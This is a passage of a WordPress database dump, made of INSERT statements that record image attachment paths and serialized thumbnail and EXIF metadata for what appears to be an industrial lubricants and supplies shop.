:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (62, 40, '_wp_attached_file', '2016/08/Krytox_1.png'); 
INSERT INTO `wp_postmeta` VALUES (63, 40, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:189;s:6:"height";i:68;s:4:"file";s:20:"2016/08/Krytox_1.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (64, 41, '_wp_attached_file', '2016/08/Krytox1.png'); 
INSERT INTO `wp_postmeta` VALUES (65, 41, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:189;s:6:"height";i:68;s:4:"file";s:19:"2016/08/Krytox1.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (66, 42, '_wp_attached_file', '2016/08/Krytox1_original.png'); 
INSERT INTO `wp_postmeta` VALUES (67, 42, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:195;s:6:"height";i:66;s:4:"file";s:28:"2016/08/Krytox1_original.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (68, 43, '_wp_attached_file', '2016/08/lenses.jpg'); 
INSERT INTO `wp_postmeta` VALUES (69, 43, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:300;s:6:"height";i:228;s:4:"file";s:18:"2016/08/lenses.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"lenses-250x228.jpg";s:5:"width";i:250;s:6:"height";i:228;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"lenses-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"lenses-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (70, 44, '_wp_attached_file', '2016/08/logo-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (71, 44, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:167;s:6:"height";i:91;s:4:"file";s:18:"2016/08/logo-2.jpg";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (74, 46, '_wp_attached_file', '2016/08/lubricants_page.jpg'); 
INSERT INTO `wp_postmeta` VALUES (75, 46, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:301;s:4:"file";s:27:"2016/08/lubricants_page.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"lubricants_page-340x301.jpg";s:5:"width";i:340;s:6:"height";i:301;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"lubricants_page-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"lubricants_page-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"lubricants_page-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (76, 47, '_wp_attached_file', '2016/08/medical-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (77, 47, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:338;s:6:"height";i:310;s:4:"file";s:21:"2016/08/medical-2.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"medical-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"medical-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"medical-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (78, 48, '_wp_attached_file', '2016/08/metal.jpg'); 
INSERT INTO `wp_postmeta` VALUES (79, 48, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:250;s:6:"height";i:258;s:4:"file";s:17:"2016/08/metal.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:17:"metal-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:17:"metal-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:17:"metal-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (80, 49, '_wp_attached_file', '2016/08/milllube.jpg'); 
INSERT INTO `wp_postmeta` VALUES (81, 49, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:301;s:4:"file";s:20:"2016/08/milllube.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"milllube-340x301.jpg";s:5:"width";i:340;s:6:"height";i:301;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"milllube-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"milllube-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"milllube-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (82, 50, '_wp_attached_file', '2016/08/mslogo-1-e1471289515793.png'); 
INSERT INTO `wp_postmeta` VALUES (83, 50, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:167;s:6:"height";i:91;s:4:"file";s:35:"2016/08/mslogo-1-e1471289515793.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (84, 51, '_wp_attached_file', '2016/08/needle.jpg'); 
INSERT INTO `wp_postmeta` VALUES (85, 51, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:590;s:6:"height";i:250;s:4:"file";s:18:"2016/08/needle.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"needle-340x250.jpg";s:5:"width";i:340;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"needle-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"needle-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"needle-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"needle-510x250.jpg";s:5:"width";i:510;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (86, 52, '_wp_attached_file', '2016/08/pumps.jpg'); 
INSERT INTO `wp_postmeta` VALUES (87, 52, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:300;s:6:"height";i:328;s:4:"file";s:17:"2016/08/pumps.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:17:"pumps-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:17:"pumps-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:17:"pumps-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (88, 53, '_wp_attached_file', '2016/08/sensor.jpg'); 
INSERT INTO `wp_postmeta` VALUES (89, 53, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:300;s:6:"height";i:228;s:4:"file";s:18:"2016/08/sensor.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"sensor-250x228.jpg";s:5:"width";i:250;s:6:"height";i:228;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"sensor-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"sensor-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (90, 54, '_wp_attached_file', '2016/08/singlehanded.jpg'); 
INSERT INTO `wp_postmeta` VALUES (91, 54, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:300;s:6:"height";i:328;s:4:"file";s:24:"2016/08/singlehanded.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"singlehanded-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"singlehanded-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"singlehanded-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (92, 55, '_wp_attached_file', '2016/08/slide1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (93, 55, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1920;s:6:"height";i:800;s:4:"file";s:18:"2016/08/slide1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"slide1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"slide1-800x333.jpg";s:5:"width";i:800;s:6:"height";i:333;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"slide1-768x320.jpg";s:5:"width";i:768;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:19:"slide1-1600x667.jpg";s:5:"width";i:1600;s:6:"height";i:667;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"slide1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"slide1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"slide1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"slide1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (94, 56, '_wp_attached_file', '2016/08/slide1_crop.jpg'); 
INSERT INTO `wp_postmeta` VALUES (95, 56, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1916;s:6:"height";i:759;s:4:"file";s:23:"2016/08/slide1_crop.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"slide1_crop-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"slide1_crop-800x317.jpg";s:5:"width";i:800;s:6:"height";i:317;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"slide1_crop-768x304.jpg";s:5:"width";i:768;s:6:"height";i:304;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"slide1_crop-1600x634.jpg";s:5:"width";i:1600;s:6:"height";i:634;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"slide1_crop-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"slide1_crop-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"slide1_crop-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"slide1_crop-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (96, 57, '_wp_attached_file', '2016/08/slide1_original.jpg'); 
INSERT INTO `wp_postmeta` VALUES (97, 57, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:500;s:4:"file";s:27:"2016/08/slide1_original.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"slide1_original-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"slide1_original-800x250.jpg";s:5:"width";i:800;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"slide1_original-768x240.jpg";s:5:"width";i:768;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"slide1_original-1600x500.jpg";s:5:"width";i:1600;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"slide1_original-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"slide1_original-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"slide1_original-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"slide1_original-510x500.jpg";s:5:"width";i:510;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (98, 58, '_wp_attached_file', '2016/08/slide1_v1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (99, 58, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1920;s:6:"height";i:800;s:4:"file";s:21:"2016/08/slide1_v1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"slide1_v1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"slide1_v1-800x333.jpg";s:5:"width";i:800;s:6:"height";i:333;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"slide1_v1-768x320.jpg";s:5:"width";i:768;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"slide1_v1-1600x667.jpg";s:5:"width";i:1600;s:6:"height";i:667;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"slide1_v1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"slide1_v1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"slide1_v1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"slide1_v1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (100, 59, '_wp_attached_file', '2016/08/solvents-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (101, 59, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:220;s:6:"height";i:179;s:4:"file";s:22:"2016/08/solvents-2.jpg";s:5:"sizes";a:1:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"solvents-2-200x179.jpg";s:5:"width";i:200;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (102, 60, '_wp_attached_file', '2016/08/spray.jpg'); 
INSERT INTO `wp_postmeta` VALUES (103, 60, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:550;s:6:"height";i:481;s:4:"file";s:17:"2016/08/spray.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"spray-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:17:"spray-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:17:"spray-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:17:"spray-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:17:"spray-510x481.jpg";s:5:"width";i:510;s:6:"height";i:481;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (104, 61, '_wp_attached_file', '2016/08/suit.jpg'); 
